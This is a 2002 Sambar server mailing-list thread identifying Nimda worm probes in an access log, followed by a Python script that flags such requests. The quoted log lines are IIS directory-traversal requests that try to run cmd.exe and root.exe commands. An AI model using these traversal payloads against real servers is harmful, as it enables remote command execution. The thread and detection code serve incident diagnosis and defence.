I have simply notified the webmasters that their servers are infected with the Nimda
Virus and requested that they correct the situation.
Dave Culbertson
On 12/May/2002 00:08:16, [EMAIL PROTECTED] wrote:
> Actually I would not recommend supplying the fixes to the offender. Instead I would
> recommend they download the hotfix examiner from MS. Utilizing XML, this examiner will
> evaluate all the products and required hotfixes and give them a report. There have
> been numerous hotfix releases since Nimda first arrived for several products
> besides IIS. It would be best to plug all the holes and not just one. If anyone would
> like, you can email me off list and I will send anyone asking the hotfix checker and
> the latest XML, but I would prefer you to go to MS and download them :)
>
> Danny
>
> On 11/May/2002 10:37:17, Kim A. Currier wrote:
> > If anyone needs the file, Dave, I have IIS running, and I have the "Healing"
> > file for anyone that needs it. Just email me, it is only a few Kbytes, and
> > can be easily emailed...
> >
> > Kim
> >
> > ----- Original Message -----
> > From: "Dave Culbertson" <[EMAIL PROTECTED]>
> > To: <[EMAIL PROTECTED]>
> > Sent: Saturday, May 11, 2002 8:02 AM
> > Subject: [sambar] Access log entries {03}
> >
> >
> > > Thanks, Hank, Tony and Alex. I was aware that it was no harm to Sambar and
> > > since I don't run IIS, no worries here. However, I have tracked down one of
> > > the offending servers and wanted to contact them with informed information.
> > > That's why I needed the name of the virus on their server.
> > >
> > > Dave Culbertson
> > >
> > > On 11/May/2002 10:51:22, Tony Mallen wrote:
> > > > Nimda virus from unpatched Microsoft servers. But it's getting a 404 error
> > > > so should be okay.
> > > >
> > > > On 11/May/2002 04:59:49, Dave Culbertson wrote:
> > > > > Does anyone recognize what kind of virus or bot would cause the following access log entries?
> > > > >
> > > > > 64.65.199.33 - - [04/May/2002:00:45:06 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:07 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:08 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:09 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:10 -0400] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:11 -0400] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:12 -0400] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET /scripts/..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:14 -0400] "GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:15 -0400] "GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:16 -0400] "GET /scripts/..�o../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:17 -0400] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:21 -0400] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:23 -0400] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:25 -0400] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > >
> > > > > I am being accessed by quite a few computers with the same or similar
> > > > > entries and would like to know the name of what this is. Thanks.
> > > > >
> > > > > Dave Culbertson
> > > > >
-------------------------------------------------------
To unsubscribe please go to http://www.sambar.ch/list/
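
The check discussed in this thread (which clients are sending these IIS probes, and did any of them get something other than a 404) can be run over an access log as follows. This is an added example, not code from the list or from Sambar; the function names are hypothetical, the first three sample lines are taken from the log quoted above, and the last two are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# First three lines are from the quoted log; the last two are constructed benign requests.
SAMPLE_LOG = """\
64.65.199.33 - - [04/May/2002:00:45:06 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
64.65.199.33 - - [04/May/2002:00:45:10 -0400] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
64.65.199.33 - - [04/May/2002:00:45:25 -0400] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
192.0.2.10 - - [04/May/2002:00:50:00 -0400] "GET /index.html HTTP/1.0" 200 1024 0 "-" "-"
192.0.2.77 - - [04/May/2002:01:02:03 -0400] "GET /docs/cmd.exe-notes.html HTTP/1.0" 200 2048 0 "-" "-"
"""

# client, ident, user, [timestamp], "METHOD target PROTOCOL", status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
PROBE_NAMES = {"cmd.exe", "root.exe"}  # executables requested in the quoted entries


def normalize(path, max_rounds=3):
    """Percent-decode until stable, then fold backslashes and case."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/").lower()


def summarize(log_text):
    """Per client IP: probe count, probes using '..' traversal, probes not rejected."""
    hits = defaultdict(lambda: {"probes": 0, "traversal": 0, "served": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _ts, _method, target, status = m.groups()
        segments = normalize(target.partition("?")[0]).split("/")
        if segments[-1] not in PROBE_NAMES:
            continue  # ordinary request, or a name that merely contains "cmd.exe"
        entry = hits[ip]
        entry["probes"] += 1
        entry["traversal"] += ".." in segments
        entry["served"] += int(status) < 400  # anything below 400 needs a closer look
    return dict(hits)


if __name__ == "__main__":
    for ip, counts in summarize(SAMPLE_LOG).items():
        print(ip, counts)
```

A non-zero `served` count is the case that matters: it means a probe was answered with something other than an error, unlike the 404s in this thread.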